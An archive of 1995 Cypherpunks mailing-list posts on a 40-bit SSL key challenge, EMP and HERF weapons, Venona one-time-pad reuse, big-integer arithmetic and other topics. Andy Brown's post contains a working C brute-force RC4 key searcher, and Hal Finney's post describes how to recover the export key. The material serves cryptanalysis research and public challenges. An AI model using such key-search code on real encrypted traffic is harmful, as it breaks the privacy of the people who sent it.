0x1e 0x27 0x5d 0x6a 0x53 0x79 0xd2 0x2e 0x01 0x5d 0x06 0x25 0x6f 0xaa 0x49 0x68
0x73 0x4e 0x35 0x6b 0x87 0x47 0x6d 0x26 0xb6 0xb0 0x1e 0xd0 0x96 0xd5 0xe6 0x4f
0x94 0x10 0x9f 0x5f 0x83 0x7e 0x0c 0x67 0x36 0x82 0xce 0xcb 0xb1 0xd5 0xc9 0xf9
0xf5 0x32 0xa9 0xf3 0x31 0xbf 0x40 0xe4 0xa6 0x24 0x0e 0xc3 0xfe 0x61 0x24 0x59
0x9d 0x85 0x35 0x0d 0x7d 0xbe 0x16 0x0b 0x8a 0x98 0x74 0x7b 0x5a 0x37 0x73 0x30
0xd9 0x66 0x6c 0x65 0xaf 0xd4 0xc7 0x2a 0x8f 0x14 0xe3 0xf6 0x06 0x63 0x19 0x53
0xc5 0x9a 0x69 0x63 0x29 0x04 0x7a 0x28 0x0e 0x7b 0x17 0xf3 0x60 0xee 0x9d 0xbd
0xe5 0x00 0x0a 0x9d 0x1b 0xc5 0x26 0x93 0x19 0x78 0x43 0x2f 0xe4 0x9a 0x27 0x3c
0x13 0x03 0x9c 0xab 0xad 0xad 0xe1 0xbd 0x8b 0x7c 0x04 0x74 0x7e 0x08 0x50 0xa6
0x19 0x28 0xb7 0x6c 0xbe 0x2b 0x48 0x14 0xd2 0xcb 0xa6 0xad 0x69 0x41 0x31 0x93
0x3a 0x8d 0x87 0x78 0x80 0xc1 0x85 0xa5 0x7a 0x79 0xd1 0x55 0xca 0xb8 0x94 0x0b
0x65 0x3e 0xf2 0x51 0x8d 0xae 0x89 0x87 0x96 0xae 0xd5 0x4d 0x2f 0x14 0x66 0xe6
0xcc 0x63 0x2f 0x50 0x98 0x98 0x59 0xfa 0xf6 0xeb 0xb6 0x44 0x9d 0xc2 0x6c 0xe2
0x7d 0xc9 0x47 0xfa 0x3d 0xa4 0x6b 0x71 0x52 0xcc 0x15 0xdf 0xb3 0x92 0x3f 0x67
0x8e 0x9e 0x84 0xd6 0x39 0xa0 

This ends the communication.

To try to attack this, the most effective approach would be to calculate
CLIENT-READ-KEY by trying all possible values for the 40 least
significant bits of the MASTER-KEY, and feeding that into the MD5
formula.  Then use the known plaintext in the SERVER-VERIFY message to
check the result.  Once the proper 40 bit value is found,
CLIENT-WRITE-KEY can easily be calculated and the data messages
decrypted.

Good luck!

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 12 Jul 95 10:19:00 PDT
To: cypherpunks@toad.com
Subject: My only words on "Electromagnetic Pulse" Damage
Message-ID: <ac294be5040210042e73@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Much discussion this morning about EMP, electromagnetic pulse weapons, HERF
guns, Winn Schwartau's "Information Warfare" scenarios, TEMPEST, etc.

Not closely related to Cypherpunks themes, but lots of speculation is
continuing. I happen to know a fair amount about chip vulnerability to
various kinds of radiation and electrostatic discharge, and have had
contacts with folks who know Schwartau. (I was also interviewed for a
Schwartau-oriented BBC television program called "The I-Bomb.")

Here's what I know:

* EMP can of course zap devices. High electric field gradients can induce
voltage drops that blow inputs, burn out circuits, etc. Lots of mechanisms
for this, of course. Latch-up in CMOS circuits, field oxide overvoltage
breakdown, etc. There is an entire sub-industry devoted to electrostatic
discharge (ESD), with conferences, products, consulting services, etc.

* However, getting the voltages coupled into circuits is another matter.
Modern chips can usually handle static charge buildups that are in the tens
of thousands of volts range (input protection devices are on the input
pads). Static discharge should be avoided (wrist straps, etc.), but most
modern devices will survive the static discharges that folks can generate.

* The point? A _distant_ (tens of meters away) source of electromagnetic
fields will have a pretty hard time of creating field gradients able to
equal these 10,000 volt local fields caused routinely by static buildup.
(Electric fields are of course measured in terms of "volts per meter"...do
the math.)

* The traditional EMP work is well-covered in each year's "Nuclear and
Space Radiation Effects Conference," the Proceedings of which are included
in the December issue each year of "IEEE Transactions on Nuclear Science
and Space Radiation Effects." I advise anyone interested in this topic to
consult these sources. (I've been to a few of these conferences, beginning
in 1978.)

* Most of the traditional EMP work is oriented toward the detonation of
nukes in orbit, where the interaction of the photons from the bomb with
electrons in the upper atmosphere create an electromagnetic field of
millions of volts per meter, the so-called "electromagnetic pulse" that
blows circuits. (This effect was apparently first noticed, by U.S.
scientists at least, after a 1962 high altitude burst over Johnson Atoll in
the Pacific, with electric circuits as far away as Hawaii being blown.)

* Schwartau has not, to my knowledge, ever seen a direct demonstration of
the effects he is describing in his book. In fact, much of his "HERF gun"
stuff is admittedly speculative.

* He has gotten interest from British intelligence (MI-5 or MI-6, not sure
which) in his "scenarios" for knocking out financial centers with EMP bombs
and HERF guns. A friend of mine, who can speak up if he wishes here, has
had some contacts with Schwartau and may have started to do some
preliminary experiments on this stuff.

(The EMP/HERF folks in governments have of course a lot of experience here.
I'm just saying that the "Schwartau crowd" appears to just be getting
started on actual experiments, so any speculations in "Information Warfare"
should be taken as just that, as speculations.)

* As a matter of commenting on one thread about damage to the "HERF gun"
itself, the conventional notion is that such a device would be a "set and
forget" device, with a suitcase planted near a corporate office complex and
set to "detonate" some time later. All the talk about reuse and damage to
the operator is beside the point. (As is the speculation about effects on
the human  body....bodies can withstand incredibly high fields, so long as
a ground path for current does not form (electrocution)....I could go on
about this, but won't.)

* In my opinion, Schwartau's chief interest is in spreading fear and
concern about the "vulnerability" of the world's "information
infrastructure." This cranks up interest in his book, in getting talk show
interviews, etc. He may have "patriotic" motives as well, but I think a
large part of what we're seeing is the usual, and increasingly common,
journalistic hype.

This is not to say there is no basis for concern, just that this is not the
first and foremost concern. After, cutting power lines has long been an
easy way to knock out economic activity--it may have recently happened in
Penang, Malaysis, for example, where many chip assembly plans were knocked
off-line for a few weeks by a power cable cut.

This is all I'll say on the current debate on TEMPEST, HERF, EMP, etc.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 12 Jul 95 08:26:32 PDT
To: perry@imsi.com
Subject: Re: QED_jak
In-Reply-To: <199507121353.JAA23961@pipe1.nyc.pipeline.com>
Message-ID: <9507121524.AA06294@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Could it be that they were using the pads more than once?  That's the
simplest flaw I can imagine.

Also:

 > >       one of its oldest secrets: how a small team of
 > >       codebreakers found the first clues that the Soviet Union
 > >       sought to steal the blueprints for the atomic bomb in
 > >       World War II.

Gee, why did it take a squad of codebreakers to come to the conclusion
that the Soviets sought to steal atomic secrets?  I mean, couldn't
they just kinda scratch their heads and decide it was highly unlikely
that the Soviets *wouldn't* do it?  And why would they need to "crack"
the code at all?  Seems like they could do some controlled information
leaks and then do some traffic flow analysis via whatever known
communications channels operatives were believed to use; all they
needed was grounds for suspicion, after all.

I assume there's a lot about this not revealed yet, or not clear from
the brief synopsis above.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 12 Jul 95 07:28:16 PDT
To: John Young <jya@pipeline.com>
Subject: Re: QED_jak
Message-ID: <199507121427.KAA09285@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 7/12/95 -0400, John Young wrote:
>   7-12-95. NYPaper:
>
>
>   "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
>   Clues That Led to Code-Breaking."
>
>      The American intelligence establishment today unveiled
>      one of its oldest secrets: how a small team of
>      codebreakers found the first clues that the Soviet Union
>      sought to steal the blueprints for the atomic bomb in
>      World War II.  Using just brain power -- no computers,
>      no stolen skeleton keys -- the cryptographers slowly
>      cracked what was thought to be an unbreakable code. 


>      service.  The messages were like a jigsaw puzzle with a
>      billion pieces -- all black. They had been double-coded
>      by a system called a one-time pad -- a unique random
>      code for each message, converting words to numbers in a
>      pattern used only once.                        HOO_doo

Note Julius Rosenberg's code name was "liberal".

The NSA said that the Soviets were using a one-time-pad.  The implication is that sloppy encryption practice caused Soviet code clerks to sometimes reuse the random material thus converting the code into a code book system that could be read.

DCF

"A man perfects himself by working. Foul jungles are cleared
away, fair seed-fields rise instead, and stately cities; and withal
the man himself first ceases to be a jungle, and foul unwholesome
desert thereby. . . . The man is now a man." -- Carlyle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 12 Jul 95 09:35:03 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121351.AA0053320@netman.eng.auburn.edu>
Message-ID: <Pine.3.89.9507121027.B1475-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Doug Hughes wrote:

> Go see Winn Schwartau talk about HERF guns sometime. He passed around
> a picture of a device for < US$500 that could crash any computer within
> 50 yards..  Then again, it isn't too good for the person firing the gun
> either.. (mega EM emissions).

That all depends on the power level, and the emission pattern of the 
device, and the frequency.  I've been working within 10 feet of a dipole 
being fed by a 1kW amplifier before, and it didn't make me sterile (but 
it might've loosened a filling or two <grin>).

> The parts are available if you know what to get. a VERY enlightening
> and frightening presentation. I don't think he personally has built one.
> His presentation contained a presentation on TEMPEST emissions, and
> low level EM field effects on sensitive equipment problems too (a PBS
> documentary - a VERY compelling presentation of why you should never
> use walkman/CD players/radios/electronics equipment on airplanes if
> they say not to, and you value your life)

This sounds like absolute propoganda.  If you do the calculations, you'll 
see that a 1 watt transmitter sitting 100 feet away from your target will 
generate an EMF less than that 1000kW ERP TV transmitter array you just 
flew over.  If aircraft avionics were *that* sensitive, we'd have planes 
falling out of the sky, and we don't.  Add to that the HF and VHF 
transmitting equipment in the cockpit, plus the microwave ovens in the 
fore and aft, PLUS the phones they have on the plane, and it adds up to a 
sizeable amount of RF bouncing around the cabin without you and your 2m 
talkie with it's 6 dB loss rubber duckie.

Now, if every passenger fired up their 2m talkies, that might pose a 
problem, but then again every passenger wouldn't be using one, would they?

Again, sounds like "we want to totally control your environment for your 
safety (actually, to minimize our liability)" crap.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 07:44:40 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121351.AA0053320@netman.eng.auburn.edu>
Message-ID: <9507121444.AA10523@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> Go see Winn Schwartau talk about HERF guns sometime. He passed around
> a picture of a device for < US$500 that could crash any computer within
> 50 yards.

If it costs that little, I'd like to see one demonstrated. I've heard
of no demonstrations of such things.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 07:45:17 PDT
To: John Young <jya@pipeline.com>
Subject: Re: QED_jak
In-Reply-To: <199507121353.JAA23961@pipe1.nyc.pipeline.com>
Message-ID: <9507121445.AA10531@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>    "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
>    Clues That Led to Code-Breaking."
> 
>       The American intelligence establishment today unveiled
>       one of its oldest secrets: how a small team of
>       codebreakers found the first clues that the Soviet Union
>       sought to steal the blueprints for the atomic bomb in
>       World War II.  Using just brain power -- no computers,
>       no stolen skeleton keys -- the cryptographers slowly
>       cracked what was thought to be an unbreakable code. 

The reports claimed the spys were using one time pads in some flawed
manner, but did not explain very well what the problem was. Does
anyone out there know?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 12 Jul 95 07:48:40 PDT
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Moby ints [Re: Num Rat]
In-Reply-To: <199507120139.SAA07236@shell1.best.com>
Message-ID: <199507121448.KAA06858@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 07:31 PM 7/11/95 -0400, Ray Cromwell wrote:
> > However, it's only worthwhile for large
> > numbers (>512 bits). At n=512, if your bigints are stored as polynomials
> > with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64
> > (so the FFT method and the Karatsuba method are equivalent for numbers
> > of that size)
> 
> I conjecture that the constant factor is rather smaller for the 
> Karatsuba method, so the turnover should be somewhat higher than
> 512 bits.

  True, the Karatsuba method does seem "simplier" than a fast fourier
transform (which a naive implementation would use complex math), however
Karatsuba has some hidden costs which the FFT technique doesn't. Karatsuba
requires dynamically resized integers. (i.e. when you split into subproblems,
you have to rescale to n/2 bit integers) Karatsuba also has to do several
big_int additions per subproblem that the FFT doesn't. If the FFT-Poly
routine is done over a prime field, and it is coded iteratively, it just
might come close to Karatsuba for small n. I am not aware of any 
experimental data, but I am working on the implementation of a high
performance portable big_int library right now, and I'll be doing
some data collecting. 

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 12 Jul 95 02:55:39 PDT
To: cypherpunks@toad.com
Subject: general RC4 key searcher: optimisations anyone?
Message-ID: <Pine.SOL.3.91.950712102618.28272C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

The following program is the part of my RC4 key search program that
actually does the searching, adapted into a small speed test.  It is
designed to handle any size key, with any number of unknown bits, in any
position within the key.  There are, of course, problems with it in its 
current form:


1.  It's too slow.  I get 50% of the performance of the bruterc4.c on 
    utopia.hacktic.nl (~9500/sec on a 60Mhz Pentium and ~12000/sec on a 
    Sparc 20)

2.  It can only handle bit offsets of 0 (i.e. the lower n bits of the key 
    are unknown).  I'm unsure of a really fast way of generalising this 
    to any (contiguous) n bits.

3.  There are probably bugs.


The code is included below.  Does anyone have any comments?


- Andy

--------------------------- begin code fragment ------------------------

/* RC4 Brute Force Key Searcher, by Andy Brown 1995
   
   This part of the package is meant to be portable between most systems
   so that Unix users can take part in the searching.  After all, the
   kind of really high powered systems that can make a large dent in the
   key space are not running Windows NT.  You will, however, require
   an ANSII compiler */


#include <stdio.h>
#include <time.h>
#include <ctype.h>

/* function declarations */

int main(void);
char *search_range(char *,unsigned long,unsigned long,char *,int,
                   unsigned char *,unsigned char *,int);

static void hex_to_bytes(char *,unsigned char *);


#define SwapByte(a,b) ((a)^=(b),(b)^=(a),(a)^=(b))
#define hexdigit(a) ((a)<10 ? (a)+'0' : (a)-10+'A')
#define decdigit(a) (isdigit(a) ? (a)-'0' : toupper(a)-'A'+10)


/*****************************/
/* Main function: test speed */
/*****************************/

int main(void)
{
/* The key has 20 "unknown" bits */

  unsigned char *keyhex="0102030405060708090A0B0C0D000000";
  unsigned char *first="0";
  unsigned char ciphertext[11]=
    { 0xF2,0xA2,0xA0,0xF6,0x0F,0xBD,0x69,0x98,0xC0,0xFF,0x4C };

  char *retval;
  time_t before,diff;

  before=time(NULL);
  retval=search_range(first,0xFFFFF,0,keyhex,0,"hello world",ciphertext,11);
  diff=time(NULL)-before;

  if(retval==NULL)
    fprintf(stderr,"Key not found, bug in key search code\n");
  else
    fprintf(stderr,"Key is: %s\n%ld keys/sec\n",retval,0xFFFFFL/(long)diff);

  return 0;
}


/***********************************/ 
/* Search a region of the keyspace */
/***********************************

Arguments:
  start_str:  ASCII hex representation of the first "search key"
  testsl:     low order 32 bits of the number of keys to test
  testsh:     high order 32 bits of the number of keys to test
  keyhex:     ASCII hex representation of the key "skeleton"
              Zeros appear in the key throughout the search range
  firstbit:   zero based index of the first unknown bit
  plaintext:  known plaintext
  ciphertext: corresponding ciphertext
  textsize:   number of bytes of plain/ciphertext

NB: A "search key" is an offset into the searchable keyspace, not
    a full key in itself.  It may vary from 0..(2^numbits)-1

Returns:
  NULL if the key is not found in the search range, otherwise an ASCII
  hex representation of the key is returned.  This pointer must be
  dynamically allocated with malloc
*/

char *search_range(char *start_str,unsigned long testsl,unsigned long testsh,
		   char *keyhex,int firstbit,
                   unsigned char *plaintext,unsigned char *ciphertext,
		   int textsize)
{
  unsigned char *start,*key,*skeleton,state[256],index1,index2;
  char *retval;
  int keybytes,startbytes,x,y,counter,i,found=0;
  unsigned long lowcounter,highcounter;

/* allocate space for the key bytes and our starting value */

  keybytes=strlen(keyhex)/2;
  if(strlen(keyhex)&1)
    keybytes++;

  startbytes=strlen(start_str)/2;
  if(strlen(start_str)&1)
    startbytes++;

  start=(unsigned char *)malloc(keybytes);
  memset(start,'\0',keybytes);
  skeleton=(unsigned char *)malloc(keybytes);
  key=(unsigned char *)malloc(keybytes);

/* convert the hex strings to bytes */

  hex_to_bytes(start_str,start+keybytes-startbytes);
  hex_to_bytes(keyhex,skeleton);

/* OK, now things get time-critical.  We are about to drop into a loop
   that prepares and tests each candidate key */

  for(highcounter=0;highcounter<=testsh;highcounter++)
  {
    for(lowcounter=0;lowcounter<testsl;lowcounter++)
    {
    /* construct the key from the skeleton and our part */

      if(!firstbit)
      {
	memcpy(key,skeleton,keybytes);
	for(i=keybytes-1;i>startbytes;i--)
	  key[i]|=start[i];
      }

    /* prepare the key */

      for(counter=0;counter<256;counter++)
	state[counter]=(unsigned char)counter;

      x=y=0;
      index1=index2=0;             

      for(counter=0;counter<256;counter++)
      {
	index2=(key[index1]+state[counter]+index2) & 0xFF;
      	SwapByte(state[counter],state[index2]);

      	if(++index1==keybytes)
	  index1=0;
      }

/* do two RC4 operations as a preliminary test.  If this fails then test
   the next one, then the rest.  This should result in a lot of rejections
   before the rest of the loop is entered */

      x=(x+1) & 0xFF;
      y=(state[x]+y) & 0xFF;
      SwapByte(state[x],state[y]);
      if(plaintext[0]==(ciphertext[0]^state[(state[x]+state[y]) & 0xFF]))
      {
	x=(x+1) & 0xFF;
      	y=(state[x]+y) & 0xFF;
      	SwapByte(state[x],state[y]);
      	if(plaintext[1]==(ciphertext[1]^state[(state[x]+state[y]) & 0xFF]))
      	{

      /* rest of the loop.  This will only be entered, on average once
	 every 65536 tests */

	  for(i=2;i<textsize;i++)
	  {
	    x=(x+1) & 0xFF;
	    y=(state[x]+y) & 0xFF;
	    SwapByte(state[x],state[y]);
	    if(plaintext[i]!=(ciphertext[i]^state[(state[x]+state[y]) & 0xFF]))
	      break;
	  }

	/* if we got to the end of the loop then that's it.  We have won */

	  if(i==textsize)
	  {
	    found=1;
      	    goto endloops;
	  }
      	}
      }
  
    /* increment our key segment */

      i=keybytes-1;
      do
      {
      	start[i]++;
      } while(!start[i--]);
    }
  }

/* free memory */

endloops:
  free(start);
  free(skeleton);

  if(found)
  {
    retval=(char *)malloc((keybytes*2)+2);
    i=0;
    for(i=0;i<keybytes;i++)
    {
      retval[i*2]=hexdigit((key[i]&0xF0)>>4);
      retval[(i*2)+1]=hexdigit(key[i]&0xF);
    }
    retval[i*2]='\0';

    return retval;
  }
  else
    return NULL;
}


/*******************************/
/* convert hex string to bytes */
/*******************************

eg. "05FC9" would become 0x00,0x5F,0xC9 */

static void hex_to_bytes(char *str,unsigned char *bytes)
{
  int i,firstzero=(strlen(str)&1) ? 1 : 0;
  unsigned char b;

  i=0;
  while(i<(int)strlen(str))
  {
    if(firstzero)
      firstzero=0;
    else
    {
      b=(decdigit(str[i]))<<4;
      i++;
    }
    b|=decdigit(str[i]);
    *bytes++=b;
    i++;
  }
}
-------------------------- end code fragment -----------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 12 Jul 95 10:56:30 PDT
To: alt@iquest.net (Al Thompson)
Subject: Re: RACIST MILITIA: ATF
Message-ID: <199507121754.KAA19611@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:46 AM 7/12/95 -0400, Perry E. Metzger wrote:
>
>
>And why, pray tell, did you repost this here?

Presumably because government instruments of repression are entirely
relevant to the Cypherpunks list.

I, for one, am much relieved to know that if I avoid conforming
to targeted stereotypes, I am unlikely to be incinerated by 
federal agencies.
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 12 Jul 95 11:12:19 PDT
To: cypherpunks@toad.com
Subject: Dr. Seuss, Technical Writer
Message-ID: <199507121756.KAA04759@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




              What If Dr. Seuss Did Technical Writing?
     
Here's an easy game to play.
Here's an easy thing to say:
    
If a packet hits a pocket on a socket on a port, 
And the bus is interrupted as a very last resort,
And the address of the memory makes your floppy disk abort, 
Then the socket packet pocket has an error to report!
     
If your cursor finds a menu item followed by a dash,
And the double-clicking icon puts your window in the trash, 
And your data is corrupted 'cause the index doesn't hash,
Then your situation's hopeless, and your system's gonna crash!
     
You can't say this?
What a shame sir!
We'll find you
Another game sir.
    
If the label on the cable on the table at your house,
Says the network is connected to the button on your mouse, 
But your packets want to tunnel on another protocol, 
That's repeatedly rejected by the printer down the hall,
     
And your screen is all distorted by the side effects of gauss 
So your icons in the window are as wavy as a souse,
Then you may as well reboot and go out with a bang, 
'Cause as sure as I'm a poet, the sucker's gonna hang!
     
When the copy of your floppy's getting sloppy on the disk, 
And the microcode instructions cause unnecessary risc,
Then you have to flash your memory and you'll want to RAM your ROM. 
Quickly turn off the computer and be sure to tell your mom!


 
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Wed, 12 Jul 95 08:09:07 PDT
To: cypherpunks@toad.com
Subject: Re: QED_jak
Message-ID: <199507121508.AA11385@bear-gate.bear.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> says:

> John Young writes:
> >    "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
> >    Clues That Led to Code-Breaking."
> > 
> The reports claimed the spys were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?
> 
> .pm

It wasn't completely random.  They reused some code material:

   But Mr. Gardner and his colleagues found patterns in
   unrelated messages. They were proof that exhausted Soviet
   code-makers had repeated themselves ...

Still, it's pretty impressive that the NSA was able to find this.

   --Dave.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or 
agreement or any information about any transaction, customer account or account 
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 08:06:22 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121459.AA0062320@netman.eng.auburn.edu>
Message-ID: <9507121505.AA10601@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> 
> Hmm.. I'm not sure I'd want to stand too close when one of those
> things goes off, but it would be an interesting demo. :)
> 
> Maybe behind an EM shield.. ;) 

What is it, exactly, that you imagine could happen to you? You realize
that you can expose humans to pretty powerful electromagnetic fields
without any noticable effect unless the frequency happens to be one
that their tissues absorb.

> I think there was a question of some microelectronics being permenently
> damaged because of fusion at the MOS level (burning through the
> gate),

To do that requires that you transfer energy from your device into the
computer you are attacking. How do you propose to do that?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 12 Jul 95 08:25:41 PDT
To: cypherpunks@toad.com
Subject: Re: QED_jak
Message-ID: <199507121525.LAA08710@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@imsi.com ("Perry E. Metzger") on 
Wed, 12 Jul 10:45 AM


>The reports claimed the spys were using one time pads 
>in some flawed  manner, but did not explain very well 
>what the problem was. Does  anyone out there know?


The NYT-reported ceremony was on C-SPAN (1 or 2) last night; I 
saw only a snippet of Moynihan mumbling. Maybe there will be a 
replay sometime today that may provide clues to the sharp ear.


Held at the CIA, the clip showed lots of backs of heads of 
creme de les zipped-lipped crypto-slaves. Unctous Freeh, 
Deutch, the spy-brass were all there, lipping the New Yarper -- 
an ouvert HERF-zap would have spattered their sucrets.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 12 Jul 95 10:29:55 PDT
To: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Subject: Re: Don't trust the net too much
In-Reply-To: <doug-9506121658.AA0069320@netman.eng.auburn.edu>
Message-ID: <Pine.3.89.9507121149.A3180-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Doug Hughes wrote:

>  This just goes to show that we live in a world of electromagnetic soup.
> We really don't know how it effects the body long term, or whether, having
> more mission or life critical electronics could be interacting with over
> devices. This was the theme of the program.

There have been many examples of this - several cases of hams having 
their pacemakers go nuts when they keyed their transmitters, etc.  But 
that doesn't mean that aviation avionics are sensitive - in fact, devices 
that are specifically designed to receive RF of a specific frequency are 
usually designed to reject RF of a different frequency, especially type 
accepted radios (the avionics package is required to be type accepted for 
that particular class of service, which includes spurious rejection, 
intermod products down XX dB, etc.)

>  Another example was on an airplane (several of them.. older ones mostly
> I believe) pilots would occassionally lose instruments (VLS, etc) when
> passengers would activate portable transistor radios and such. Particularly
> radios.. But there was another case involving a portable computer.. These
> cases have been documented. It's a good thing the plain wasn't on a 
> landing approach during a storm, or things could've gone very bad very
> quickly.

A transistor radio puts out such a minute amount of RF (at 455 KHz and/or
10.7 MHz, the IF freqs of the radio) that most insturments designed to
pick up RF can't detect this stuff from more than a few feet away.  FCC
regulations say that if your avionics is being interfered with, it's YOUR
problem, not the guy that just turned on his radio.  If someone's avionics
is being interfered when I turn on an AM/FM transistor radio, then I'd say
that he either needs to get his avionics fixed, or he's using illegal
consumer-grade radios (which are usually junk anyway - even much ham radio
gear is garbage, unfortunately), instead of the type-accepted stuff he's
supposed to be using.  I'd be interested in finding out more about this
guy and his "VLS-jumped-when-someone-turned-on-their-radio" story. 

>  I heard about the portable computer via a different source. The guy
> kept turning his computer on. The instruments would do a little dance.
> The captain would tell the stewardess, she would tell the passenger, he
> would turn it off for a while. Then, he would turn it on and repeat..
> Until finally he refused to turn it off, so they confiscated it and
> returned it at the end of the trip. Urban Legend? maybe..

The early laptop computers would put out an amazing amount of crap.  I 
used to have a Zenith laptop, and when I'd turn the thing on, it'd throw 
out junk that I could hear on every radio in the house, including the 2m 
FM stuff, the HF rig, and I could even hear it out in my car on the 2m 
mobile!  I can believe it, but that's no excuse for just saying, "well, 
let's just ban all of it..."

>  Believe what you want, but investigate the reports before dissmissing it
> out of hand as propaganda. I'd rather stay alive than rely on "theoretically
> it shouldn't matter." :)

My point is, it's not your, nor my responsibility to refrain from using 
our radios - it's the responsibility of the avionics people to make sure 
that their radios are within spec and are kept that way.  If they don't 
bother, that's not my fault.

> Keep in mind that newer planes (767, 757) let you do anything you want
> while the plane is in flight (but now while landing or takeoff), so they
> probably build better instrumentation and cabin shielding into the planes
> these days. If they say keep it off, chances are they have a good reason..

Again, my contention is that they don't.

> If you find categorical evidence to the contrary, I'm sure I would be very
> relieved to see it posted here. (rather than wondering if somebody
> in one of the 30 rows ahead of me might decide he knows better)

The ng rec.radio.amateur.misc might have some additional stuff in the FAQ,
and the ARRL certainly has a mountain of information on this - I'll poke
around.  'echo help|Mail info@arrl.org' might yield some interesting
things... 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 12 Jul 95 08:34:40 PDT
To: Cypherpunks List <cypherpunks@toad.com>
